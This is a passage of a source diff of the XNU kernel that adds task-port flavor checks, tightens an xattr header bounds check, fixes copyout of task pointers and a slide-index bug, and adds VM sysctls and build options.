manipulation entitlement so as to make API contracts consistent.) + */ + if (ut != NULL) { + if (ut->uu_flag & UT_NSPACE_NODATALESSFAULTS) { + return EDEADLK; + } + if (ut->uu_flag & UT_NSPACE_FORCEDATALESSFAULTS) { + return 0; + } + } - lck_mtx_init(&nspace_resolver_request_hash_mutex, - nspace_resolver_request_lck_grp, NULL); + /* + * If the process's iopolicy specifies that dataless files + * can be materialized, then we let it go ahead. + */ + if (p->p_vfs_iopolicy & P_VFS_IOPOLICY_MATERIALIZE_DATALESS_FILES) { + return 0; + } +#endif /* CONFIG_DATALESS_FILES */ + /* + * The default behavior is to not materialize dataless files; + * return to the caller that deadlock was detected. + */ + return EDEADLK; +} + +void +nspace_resolver_init(void) +{ +#if CONFIG_DATALESS_FILES nspace_resolver_request_hashtbl = hashinit(NSPACE_RESOLVER_REQ_HASHSIZE, M_VNODE /* XXX */, &nspace_resolver_request_hashmask); @@ -11186,7 +11196,8 @@ resolve_nspace_item_ext( return ENOTSUP; } - error = nspace_materialization_is_prevented(); + error = vfs_context_dataless_materialization_is_prevented( + vfs_context_current()); if (error) { os_log_debug(OS_LOG_DEFAULT, "NSPACE process/thread is decorated as no-materialization"); diff --git a/bsd/vfs/vfs_xattr.c b/bsd/vfs/vfs_xattr.c index 0dfcf949f..8db2c859f 100644 --- a/bsd/vfs/vfs_xattr.c +++ b/bsd/vfs/vfs_xattr.c @@ -3207,6 +3207,7 @@ check_and_swap_attrhdr(attr_header_t *ah, attr_info_t *ainfop) */ end = ah->data_start + ah->data_length; if (ah->total_size > ainfop->finderinfo->offset + ainfop->finderinfo->length || + ah->data_start < sizeof(attr_header_t) || end < ah->data_start || end > ah->total_size) { return EINVAL; diff --git a/bsd/vm/vm_unix.c b/bsd/vm/vm_unix.c index 9421ee0f9..67aceb8d1 100644 --- a/bsd/vm/vm_unix.c +++ b/bsd/vm/vm_unix.c @@ -230,6 +230,13 @@ extern int cs_executable_wire; SYSCTL_INT(_vm, OID_AUTO, cs_executable_create_upl, CTLFLAG_RD | CTLFLAG_LOCKED, &cs_executable_create_upl, 0, ""); SYSCTL_INT(_vm, OID_AUTO, cs_executable_wire, CTLFLAG_RD | CTLFLAG_LOCKED, &cs_executable_wire, 0, ""); +extern int apple_protect_pager_count; +extern int apple_protect_pager_count_mapped; +extern unsigned int apple_protect_pager_cache_limit; +SYSCTL_INT(_vm, OID_AUTO, apple_protect_pager_count, CTLFLAG_RD | CTLFLAG_LOCKED, &apple_protect_pager_count, 0, ""); +SYSCTL_INT(_vm, OID_AUTO, apple_protect_pager_count_mapped, CTLFLAG_RD | CTLFLAG_LOCKED, &apple_protect_pager_count_mapped, 0, ""); +SYSCTL_UINT(_vm, OID_AUTO, apple_protect_pager_cache_limit, CTLFLAG_RW | CTLFLAG_LOCKED, &apple_protect_pager_cache_limit, 0, ""); + #if DEVELOPMENT || DEBUG extern int radar_20146450; SYSCTL_INT(_vm, OID_AUTO, radar_20146450, CTLFLAG_RW | CTLFLAG_LOCKED, &radar_20146450, 0, ""); @@ -316,7 +323,7 @@ SYSCTL_INT(_vm, OID_AUTO, vm_shadow_max_enabled, CTLFLAG_RW | CTLFLAG_LOCKED, &v SYSCTL_INT(_vm, OID_AUTO, vm_debug_events, CTLFLAG_RW | CTLFLAG_LOCKED, &vm_debug_events, 0, ""); __attribute__((noinline)) int __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__( - mach_port_t task_access_port, int32_t calling_pid, uint32_t calling_gid, int32_t target_pid); + mach_port_t task_access_port, int32_t calling_pid, uint32_t calling_gid, int32_t target_pid, mach_task_flavor_t flavor); /* * Sysctl's related to data/stack execution. See osfmk/vm/vm_map.c */ @@ -844,9 +851,9 @@ out: */ __attribute__((noinline)) int __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__( - mach_port_t task_access_port, int32_t calling_pid, uint32_t calling_gid, int32_t target_pid) + mach_port_t task_access_port, int32_t calling_pid, uint32_t calling_gid, int32_t target_pid, mach_task_flavor_t flavor) { - return check_task_access(task_access_port, calling_pid, calling_gid, target_pid); + return check_task_access_with_flavor(task_access_port, calling_pid, calling_gid, target_pid, flavor); } /* @@ -885,14 +892,14 @@ task_for_pid( /* Always check if pid == 0 */ if (pid == 0) { - (void) copyout((char *)&t1, task_addr, sizeof(mach_port_name_t)); + (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t)); AUDIT_MACH_SYSCALL_EXIT(KERN_FAILURE); return KERN_FAILURE; } t1 = port_name_to_task(target_tport); if (t1 == TASK_NULL) { - (void) copyout((char *)&t1, task_addr, sizeof(mach_port_name_t)); + (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t)); AUDIT_MACH_SYSCALL_EXIT(KERN_FAILURE); return KERN_FAILURE; } @@ -931,7 +938,7 @@ task_for_pid( p = PROC_NULL; #if CONFIG_MACF - error = mac_proc_check_get_task(kauth_cred_get(), &pident); + error = mac_proc_check_get_task(kauth_cred_get(), &pident, TASK_FLAVOR_CONTROL); if (error) { error = KERN_FAILURE; goto tfpout; @@ -949,7 +956,8 @@ task_for_pid( } /* Call up to the task access server */ - error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, proc_selfpid(), kauth_getgid(), pid); + error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, + proc_selfpid(), kauth_getgid(), pid, TASK_FLAVOR_CONTROL); if (error != MACH_MSG_SUCCESS) { if (error == MACH_RCV_INTERRUPTED) { @@ -963,7 +971,13 @@ task_for_pid( /* Grant task port access */ extmod_statistics_incr_task_for_pid(task); - sright = (void *) convert_task_to_port(task); + + if (task == current_task()) { + /* return pinned self if current_task() so equality check with mach_task_self_ passes */ + sright = (void *)convert_task_to_port_pinned(task); + } else { + sright = (void *)convert_task_to_port(task); + } /* Check if the task has been corpsified */ if (is_corpsetask(task)) { @@ -1019,9 +1033,9 @@ task_name_for_pid( mach_port_name_t target_tport = args->target_tport; int pid = args->pid; user_addr_t task_addr = args->t; - proc_t p = PROC_NULL; - task_t t1; - mach_port_name_t tret; + proc_t p = PROC_NULL; + task_t t1 = TASK_NULL; + mach_port_name_t tret = MACH_PORT_NULL; void * sright; int error = 0, refheld = 0; kauth_cred_t target_cred; @@ -1032,7 +1046,7 @@ task_name_for_pid( t1 = port_name_to_task(target_tport); if (t1 == TASK_NULL) { - (void) copyout((char *)&t1, task_addr, sizeof(mach_port_name_t)); + (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t)); AUDIT_MACH_SYSCALL_EXIT(KERN_FAILURE); return KERN_FAILURE; } @@ -1057,7 +1071,7 @@ task_name_for_pid( proc_rele(p); p = PROC_NULL; #if CONFIG_MACF - error = mac_proc_check_get_task_name(kauth_cred_get(), &pident); + error = mac_proc_check_get_task(kauth_cred_get(), &pident, TASK_FLAVOR_NAME); if (error) { task_deallocate(task); goto noperm; @@ -1122,13 +1136,13 @@ task_inspect_for_pid(struct proc *p __unused, struct task_inspect_for_pid_args * /* Disallow inspect port for kernel_task */ if (pid == 0) { - (void) copyout((char *)&t1, task_addr, sizeof(mach_port_name_t)); + (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t)); return EPERM; } t1 = port_name_to_task(target_tport); if (t1 == TASK_NULL) { - (void) copyout((char *) &t1, task_addr, sizeof(mach_port_name_t)); + (void) copyout((char *) &tret, task_addr, sizeof(mach_port_name_t)); return EINVAL; } @@ -1158,12 +1172,8 @@ task_inspect_for_pid(struct proc *p __unused, struct task_inspect_for_pid_args * proc_rele(proc); proc = PROC_NULL; - /* - * For now, it performs the same set of permission checks as task_for_pid. This - * will be addressed in rdar://problem/53478660 - */ #if CONFIG_MACF - error = mac_proc_check_get_task(kauth_cred_get(), &pident); + error = mac_proc_check_get_task(kauth_cred_get(), &pident, TASK_FLAVOR_INSPECT); if (error) { error = EPERM; goto tifpout; @@ -1182,7 +1192,8 @@ task_inspect_for_pid(struct proc *p __unused, struct task_inspect_for_pid_args * /* Call up to the task access server */ - error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, proc_selfpid(), kauth_getgid(), pid); + error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, + proc_selfpid(), kauth_getgid(), pid, TASK_FLAVOR_INSPECT); if (error != MACH_MSG_SUCCESS) { if (error == MACH_RCV_INTERRUPTED) { @@ -1247,13 +1258,13 @@ task_read_for_pid(struct proc *p __unused, struct task_read_for_pid_args *args, /* Disallow read port for kernel_task */ if (pid == 0) { - (void) copyout((char *)&t1, task_addr, sizeof(mach_port_name_t)); + (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t)); return EPERM; } t1 = port_name_to_task(target_tport); if (t1 == TASK_NULL) { - (void) copyout((char *) &t1, task_addr, sizeof(mach_port_name_t)); + (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t)); return EINVAL; } @@ -1283,12 +1294,8 @@ task_read_for_pid(struct proc *p __unused, struct task_read_for_pid_args *args, proc_rele(proc); proc = PROC_NULL; - /* - * For now, it performs the same set of permission checks as task_for_pid. This - * will be addressed in rdar://problem/53478660 - */ #if CONFIG_MACF - error = mac_proc_check_get_task(kauth_cred_get(), &pident); + error = mac_proc_check_get_task(kauth_cred_get(), &pident, TASK_FLAVOR_READ); if (error) { error = EPERM; goto trfpout; @@ -1307,7 +1314,8 @@ task_read_for_pid(struct proc *p __unused, struct task_read_for_pid_args *args, /* Call up to the task access server */ - error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, proc_selfpid(), kauth_getgid(), pid); + error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, + proc_selfpid(), kauth_getgid(), pid, TASK_FLAVOR_READ); if (error != MACH_MSG_SUCCESS) { if (error == MACH_RCV_INTERRUPTED) { @@ -1382,7 +1390,7 @@ pid_suspend(struct proc *p __unused, struct pid_suspend_args *args, int *ret) #endif target = targetproc->task; -#ifndef CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX if (target != TASK_NULL) { /* If we aren't root and target's task access port is set... */ if (!kauth_cred_issuser(kauth_cred_get()) && @@ -1395,7 +1403,8 @@ pid_suspend(struct proc *p __unused, struct pid_suspend_args *args, int *ret) } /* Call up to the task access server */ - error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, proc_selfpid(), kauth_getgid(), pid); + error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, + proc_selfpid(), kauth_getgid(), pid, TASK_FLAVOR_CONTROL); if (error != MACH_MSG_SUCCESS) { if (error == MACH_RCV_INTERRUPTED) { @@ -1407,7 +1416,7 @@ pid_suspend(struct proc *p __unused, struct pid_suspend_args *args, int *ret) } } } -#endif +#endif /* XNU_TARGET_OS_OSX */ task_reference(target); error = task_pidsuspend(target); @@ -1460,14 +1469,14 @@ debug_control_port_for_pid(struct debug_control_port_for_pid_args *args) /* Always check if pid == 0 */ if (pid == 0) { - (void) copyout((char *)&t1, task_addr, sizeof(mach_port_name_t)); + (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t)); AUDIT_MACH_SYSCALL_EXIT(KERN_FAILURE); return KERN_FAILURE; } t1 = port_name_to_task(target_tport); if (t1 == TASK_NULL) { - (void) copyout((char *)&t1, task_addr, sizeof(mach_port_name_t)); + (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t)); AUDIT_MACH_SYSCALL_EXIT(KERN_FAILURE); return KERN_FAILURE; } @@ -1505,7 +1514,7 @@ debug_control_port_for_pid(struct debug_control_port_for_pid_args *args) if (!IOTaskHasEntitlement(current_task(), DEBUG_PORT_ENTITLEMENT)) { #if CONFIG_MACF - error = mac_proc_check_get_task(kauth_cred_get(), &pident); + error = mac_proc_check_get_task(kauth_cred_get(), &pident, TASK_FLAVOR_CONTROL); if (error) { error = KERN_FAILURE; goto tfpout; @@ -1524,7 +1533,8 @@ debug_control_port_for_pid(struct debug_control_port_for_pid_args *args) /* Call up to the task access server */ - error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, proc_selfpid(), kauth_getgid(), pid); + error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, + proc_selfpid(), kauth_getgid(), pid, TASK_FLAVOR_CONTROL); if (error != MACH_MSG_SUCCESS) { if (error == MACH_RCV_INTERRUPTED) { @@ -1607,7 +1617,7 @@ pid_resume(struct proc *p __unused, struct pid_resume_args *args, int *ret) #endif target = targetproc->task; -#ifndef CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX if (target != TASK_NULL) { /* If we aren't root and target's task access port is set... */ if (!kauth_cred_issuser(kauth_cred_get()) && @@ -1620,7 +1630,8 @@ pid_resume(struct proc *p __unused, struct pid_resume_args *args, int *ret) } /* Call up to the task access server */ - error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, proc_selfpid(), kauth_getgid(), pid); + error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, + proc_selfpid(), kauth_getgid(), pid, TASK_FLAVOR_CONTROL); if (error != MACH_MSG_SUCCESS) { if (error == MACH_RCV_INTERRUPTED) { @@ -1632,7 +1643,7 @@ pid_resume(struct proc *p __unused, struct pid_resume_args *args, int *ret) } } } -#endif +#endif /* XNU_TARGET_OS_OSX */ #if !XNU_TARGET_OS_OSX #if SOCKETS @@ -1675,7 +1686,7 @@ out: return error; } -#if CONFIG_EMBEDDED +#if !XNU_TARGET_OS_OSX /* * Freeze the specified process (provided in args->pid), or find and freeze a PID. * When a process is specified, this call is blocking, otherwise we wake up the @@ -1737,7 +1748,7 @@ out: *ret = error; return error; } -#endif /* CONFIG_EMBEDDED */ +#endif /* !XNU_TARGET_OS_OSX */ #if SOCKETS int @@ -1750,7 +1761,7 @@ networking_memstatus_callout(proc_t p, uint32_t status) * proc lock NOT held * a reference on the proc has been held / shall be dropped by the caller. */ - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED); LCK_MTX_ASSERT(&p->p_mlock, LCK_MTX_ASSERT_NOTOWNED); proc_fdlock(p); @@ -1946,6 +1957,7 @@ shared_region_check_np( mach_vm_offset_t start_address = 0; int error = 0; kern_return_t kr; + task_t task = current_task(); SHARED_REGION_TRACE_DEBUG( ("shared_region: %p [%d(%s)] -> check_np(0x%llx)\n", @@ -1954,10 +1966,10 @@ shared_region_check_np( (uint64_t)uap->start_address)); /* retrieve the current tasks's shared region */ - shared_region = vm_shared_region_get(current_task()); + shared_region = vm_shared_region_get(task); if (shared_region != NULL) { /* retrieve address of its first mapping... */ - kr = vm_shared_region_start_address(shared_region, &start_address); + kr = vm_shared_region_start_address(shared_region, &start_address, task); if (kr != KERN_SUCCESS) { error = ENOMEM; } else { @@ -2714,7 +2726,11 @@ done: * a max value. The kernel will choose a random value based on that, then use it * for all shared regions. */ -#define SLIDE_AMOUNT_MASK ~PAGE_MASK +#if defined (__x86_64__) +#define SLIDE_AMOUNT_MASK ~FOURK_PAGE_MASK +#else +#define SLIDE_AMOUNT_MASK ~SIXTEENK_PAGE_MASK +#endif int shared_region_map_and_slide_2_np( @@ -2827,7 +2843,7 @@ shared_region_map_and_slide_2_np( } mappings[m].sms_address += slide_amount; if (mappings[m].sms_slide_size != 0) { - mappings[i].sms_slide_start += slide_amount; + mappings[m].sms_slide_start += slide_amount; } } } @@ -2894,19 +2910,8 @@ static int vm_mixed_pagesize_supported = 0; SYSCTL_INT(_debug, OID_AUTO, vm_mixed_pagesize_supported, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &vm_mixed_pagesize_supported, 0, "kernel support for mixed pagesize"); - -extern uint64_t get_pages_grabbed_count(void); - -static int -pages_grabbed SYSCTL_HANDLER_ARGS -{ -#pragma unused(arg1, arg2, oidp) - uint64_t value = get_pages_grabbed_count(); - return SYSCTL_OUT(req, &value, sizeof(value)); -} - -SYSCTL_PROC(_vm, OID_AUTO, pages_grabbed, CTLTYPE_QUAD | CTLFLAG_RD | CTLFLAG_LOCKED, - 0, 0, &pages_grabbed, "QU", "Total pages grabbed"); +SCALABLE_COUNTER_DECLARE(vm_page_grab_count); +SYSCTL_SCALABLE_COUNTER(_vm, pages_grabbed, vm_page_grab_count, "Total pages grabbed"); SYSCTL_ULONG(_vm, OID_AUTO, pages_freed, CTLFLAG_RD | CTLFLAG_LOCKED, &vm_pageout_vminfo.vm_page_pages_freed, "Total pages freed"); @@ -3344,6 +3349,47 @@ extern int pmap_ledgers_panic_leeway; SYSCTL_INT(_vm, OID_AUTO, pmap_ledgers_panic_leeway, CTLFLAG_RW | CTLFLAG_LOCKED, &pmap_ledgers_panic_leeway, 0, ""); #endif /* MACH_ASSERT */ + +extern uint64_t vm_map_lookup_locked_copy_slowly_count; +extern uint64_t vm_map_lookup_locked_copy_slowly_size; +extern uint64_t vm_map_lookup_locked_copy_slowly_max; +extern uint64_t vm_map_lookup_locked_copy_slowly_restart; +extern uint64_t vm_map_lookup_locked_copy_slowly_error; +extern uint64_t vm_map_lookup_locked_copy_strategically_count; +extern uint64_t vm_map_lookup_locked_copy_strategically_size; +extern uint64_t vm_map_lookup_locked_copy_strategically_max; +extern uint64_t vm_map_lookup_locked_copy_strategically_restart; +extern uint64_t vm_map_lookup_locked_copy_strategically_error; +extern uint64_t vm_map_lookup_locked_copy_shadow_count; +extern uint64_t vm_map_lookup_locked_copy_shadow_size; +extern uint64_t vm_map_lookup_locked_copy_shadow_max; +SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_slowly_count, + CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_slowly_count, ""); +SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_slowly_size, + CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_slowly_size, ""); +SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_slowly_max, + CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_slowly_max, ""); +SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_slowly_restart, + CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_slowly_restart, ""); +SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_slowly_error, + CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_slowly_error, ""); +SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_strategically_count, + CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_strategically_count, ""); +SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_strategically_size, + CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_strategically_size, ""); +SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_strategically_max, + CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_strategically_max, ""); +SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_strategically_restart, + CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_strategically_restart, ""); +SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_strategically_error, + CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_strategically_error, ""); +SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_shadow_count, + CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_shadow_count, ""); +SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_shadow_size, + CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_shadow_size, ""); +SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_shadow_max, + CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_shadow_max, ""); + extern int vm_protect_privileged_from_untrusted; SYSCTL_INT(_vm, OID_AUTO, protect_privileged_from_untrusted, CTLFLAG_RW | CTLFLAG_LOCKED, &vm_protect_privileged_from_untrusted, 0, ""); @@ -3416,8 +3462,84 @@ SYSCTL_PROC(_vm, OID_AUTO, shared_region_pivot, CTLTYPE_INT | CTLFLAG_WR | CTLFLAG_LOCKED, 0, 0, shared_region_pivot, "I", ""); -extern int vm_remap_old_path, vm_remap_new_path; -SYSCTL_INT(_vm, OID_AUTO, remap_old_path, - CTLFLAG_RD | CTLFLAG_LOCKED, &vm_remap_old_path, 0, ""); -SYSCTL_INT(_vm, OID_AUTO, remap_new_path, - CTLFLAG_RD | CTLFLAG_LOCKED, &vm_remap_new_path, 0, ""); +/* + * sysctl to return the number of pages on retired_pages_object + */ +static int +retired_pages_count SYSCTL_HANDLER_ARGS +{ +#pragma unused(arg1, arg2, oidp) + extern uint32_t vm_retired_pages_count(void); + uint32_t value = vm_retired_pages_count(); + + return SYSCTL_OUT(req, &value, sizeof(value)); +} +SYSCTL_PROC(_vm, OID_AUTO, retired_pages_count, CTLTYPE_INT | CTLFLAG_RD | CTLFLAG_LOCKED, + 0, 0, &retired_pages_count, "I", ""); + +SYSCTL_INT(_vm, OID_AUTO, vmtc_total, CTLFLAG_RD | CTLFLAG_LOCKED, + &vmtc_total, 0, "total text page corruptions detected"); +SYSCTL_INT(_vm, OID_AUTO, vmtc_undiagnosed, CTLFLAG_RD | CTLFLAG_LOCKED, + &vmtc_undiagnosed, 0, "undiagnosed text page corruptions"); +SYSCTL_INT(_vm, OID_AUTO, vmtc_not_eligible, CTLFLAG_RD | CTLFLAG_LOCKED, + &vmtc_not_eligible, 0, "text page corruptions not eligible for correction"); +SYSCTL_INT(_vm, OID_AUTO, vmtc_copyin_fail, CTLFLAG_RD | CTLFLAG_LOCKED, + &vmtc_copyin_fail, 0, "undiagnosed text page corruptions due to copyin failure"); +SYSCTL_INT(_vm, OID_AUTO, vmtc_not_found, CTLFLAG_RD | CTLFLAG_LOCKED, + &vmtc_not_found, 0, "text page corruptions but no diff found"); +SYSCTL_INT(_vm, OID_AUTO, vmtc_one_bit_flip, CTLFLAG_RD | CTLFLAG_LOCKED, + &vmtc_one_bit_flip, 0, "text page corruptions that had a single bit flip"); + +SYSCTL_INT(_vm, OID_AUTO, vmtc_1_byte, CTLFLAG_RD | CTLFLAG_LOCKED, + &vmtc_byte_counts[0], 0, "text page corruptions with 1 changed byte"); + +SYSCTL_INT(_vm, OID_AUTO, vmtc_2_byte, CTLFLAG_RD | CTLFLAG_LOCKED, + &vmtc_byte_counts[1], 0, "text page corruptions with 2 changed bytes"); + +SYSCTL_INT(_vm, OID_AUTO, vmtc_4_byte, CTLFLAG_RD | CTLFLAG_LOCKED, + &vmtc_byte_counts[2], 0, "text page corruptions with 3 to 4 changed bytes"); + +SYSCTL_INT(_vm, OID_AUTO, vmtc_8_byte, CTLFLAG_RD | CTLFLAG_LOCKED, + &vmtc_byte_counts[3], 0, "text page corruptions with 5 to 8 changed bytes"); + +SYSCTL_INT(_vm, OID_AUTO, vmtc_16_byte, CTLFLAG_RD | CTLFLAG_LOCKED, + &vmtc_byte_counts[4], 0, "text page corruptions with 9 to 16 changed bytes"); + +SYSCTL_INT(_vm, OID_AUTO, vmtc_32_byte, CTLFLAG_RD | CTLFLAG_LOCKED, + &vmtc_byte_counts[5], 0, "text page corruptions with 17 to 32 changed bytes"); + +SYSCTL_INT(_vm, OID_AUTO, vmtc_64_byte, CTLFLAG_RD | CTLFLAG_LOCKED, + &vmtc_byte_counts[6], 0, "text page corruptions with 33 to 64 changed bytes"); + +SYSCTL_INT(_vm, OID_AUTO, vmtc_128byte, CTLFLAG_RD | CTLFLAG_LOCKED, + &vmtc_byte_counts[7], 0, "text page corruptions with 65 to 128 changed bytes"); + +SYSCTL_INT(_vm, OID_AUTO, vmtc_256_byte, CTLFLAG_RD | CTLFLAG_LOCKED, + &vmtc_byte_counts[8], 0, "text page corruptions with >128 changed bytes"); + +#if DEBUG || DEVELOPMENT +/* + * A sysctl that can be used to corrupt a text page with an illegal instruction. + * Used for testing text page self healing. + */ +extern kern_return_t vm_corrupt_text_addr(uintptr_t); +static int +corrupt_text_addr(__unused struct sysctl_oid *oidp, __unused void *arg1, __unused int arg2, struct sysctl_req *req) +{ + uint64_t value = 0; + int error = sysctl_handle_quad(oidp, &value, 0, req); + if (error || !req->newptr) { + return error; + } + + if (vm_corrupt_text_addr((uintptr_t)value) == KERN_SUCCESS) { + return 0; + } else { + return EINVAL; + } +} + +SYSCTL_PROC(_vm, OID_AUTO, corrupt_text_addr, + CTLTYPE_QUAD | CTLFLAG_WR | CTLFLAG_LOCKED | CTLFLAG_MASKED, + 0, 0, corrupt_text_addr, "-", ""); +#endif /* DEBUG || DEVELOPMENT */ diff --git a/bsd/vm/vnode_pager.c b/bsd/vm/vnode_pager.c index b4d6d6fc6..fc3426fd5 100644 --- a/bsd/vm/vnode_pager.c +++ b/bsd/vm/vnode_pager.c @@ -56,7 +56,6 @@ #include #include -#include #include #include #include diff --git a/config/BSDKernel.exports b/config/BSDKernel.exports index f439a52cd..fc2945bab 100644 --- a/config/BSDKernel.exports +++ b/config/BSDKernel.exports @@ -569,7 +569,6 @@ _sysctl__machdep_children _sysctl__net_children _sysctl__sysctl_children _sysctl__vfs_children -_sysctl__vfs_generic _sysctl__vfs_generic_children _sysctl__vm_children _sysctl_handle_int diff --git a/config/IOKit.exports b/config/IOKit.exports index cdf84e788..f782bc540 100644 --- a/config/IOKit.exports +++ b/config/IOKit.exports @@ -880,6 +880,7 @@ __ZN18IOMemoryDescriptor13removeMappingEP11IOMemoryMap __ZN18IOMemoryDescriptor15getDMAMapLengthEPy __ZN18IOMemoryDescriptor15getDescriptorIDEv __ZN18IOMemoryDescriptor16getPreparationIDEv +__ZN18IOMemoryDescriptor16setPreparationIDEv __ZN18IOMemoryDescriptor17_CopyState_InvokeE5IORPCP15OSMetaClassBasePFiS2_P17_IOMDPrivateStateE __ZN18IOMemoryDescriptor18getPhysicalAddressEv __ZN18IOMemoryDescriptor20CreateMapping_InvokeE5IORPCP15OSMetaClassBasePFiS2_yyyyyPP11IOMemoryMapE @@ -1341,6 +1342,8 @@ __ZN29IOInterleavedMemoryDescriptorD2Ev __ZN29IOInterleavedMemoryDescriptordlEPvm __ZN29IOInterleavedMemoryDescriptornwEm __ZN6IOPMGR10gMetaClassE +__ZN6IOPMGR13enableCPUCoreEj +__ZN6IOPMGR13enableCPUCoreEjy __ZN6IOPMGRC2EPK11OSMetaClass __ZN6IOPMGRD2Ev __ZN6IOPMGRdlEPvm @@ -1473,6 +1476,7 @@ __ZN9IOService20callPlatformFunctionEPKcbPvS2_S2_S2_ __ZN9IOService20getDeviceMemoryCountEv __ZN9IOService20powerOverrideOffPrivEv __ZN9IOService20unlockForArbitrationEv +__ZN9IOService20ClientCrashed_InvokeE5IORPCP15OSMetaClassBasePFiS2_PS_yE __ZN9IOService21CopyProperties_InvokeE5IORPCP15OSMetaClassBasePFiS2_PP12OSDictionaryE __ZN9IOService21SearchProperty_InvokeE5IORPCP15OSMetaClassBasePFiS2_PKcS4_yPP8OSObjectE __ZN9IOService21getClientWithCategoryEPK8OSSymbol diff --git a/config/Libkern.exports b/config/Libkern.exports index 8e67942f2..eb6d0f438 100644 --- a/config/Libkern.exports +++ b/config/Libkern.exports @@ -690,6 +690,7 @@ _copyin _copyinstr _copyout _copyoutstr +_coretrust_interface_register _crc32 _debug_ivars_size _deflate diff --git a/config/MASTER b/config/MASTER index 3e8381e78..8beac4230 100644 --- a/config/MASTER +++ b/config/MASTER @@ -293,9 +293,9 @@ options CONFIG_MFCTBLSIZ=16 # # # configurable kernel message buffer size # -options CONFIG_MSG_BSIZE_REL=4096 # -options CONFIG_MSG_BSIZE_DEV=4096 # -options CONFIG_MSG_BSIZE_REL=16384 # +options CONFIG_MSG_BSIZE_REL=16384 # +options CONFIG_MSG_BSIZE_DEV=131072 # +options CONFIG_MSG_BSIZE_REL=131072 # options CONFIG_MSG_BSIZE_DEV=131072 # options CONFIG_MSG_BSIZE=CONFIG_MSG_BSIZE_REL # options CONFIG_MSG_BSIZE=CONFIG_MSG_BSIZE_DEV # @@ -306,6 +306,12 @@ options CONFIG_MSG_BSIZE=CONFIG_MSG_BSIZE_DEV # options CONFIG_IPC_TABLE_ENTRIES_STEPS=64 # 137898 entries # options CONFIG_IPC_TABLE_ENTRIES_STEPS=256 # 300714 entries # +# +# maximum copyout size for IPC debugging tools +# +options CONFIG_IPC_KERNEL_MAP_SIZE=16 # 16M # +options CONFIG_IPC_KERNEL_MAP_SIZE=64 # 64M # + # # configurable kernel - use these options to strip strings from panic # and printf calls. @@ -573,11 +579,6 @@ options CONFIG_KAS_INFO # kas_info support # # # MACH configuration options. # -# TASK_SWAPPER enables code that manages demand for physical memory by -# forcibly suspending tasks when the demand exceeds supply. This -# option should be on. -# -options TASK_SWAPPER # # # This defines configuration options that are normally used only during @@ -607,7 +608,6 @@ options MACH_VM_DEBUG # # # hardclock device driver. # options MACH_MP_DEBUG # # -options CONFIG_ZCACHE # Enable per-cpu caching for zones # options CONFIG_ZLEAKS # Live zone leak debugging # # @@ -650,10 +650,6 @@ options KPC # options PGO # -# MACH_COUNTERS enables code that handles various counters in the system. -# -options MACH_COUNTERS # # - # DEVELOPMENT define for development builds options DEVELOPMENT # dev kernel # @@ -742,6 +738,7 @@ options 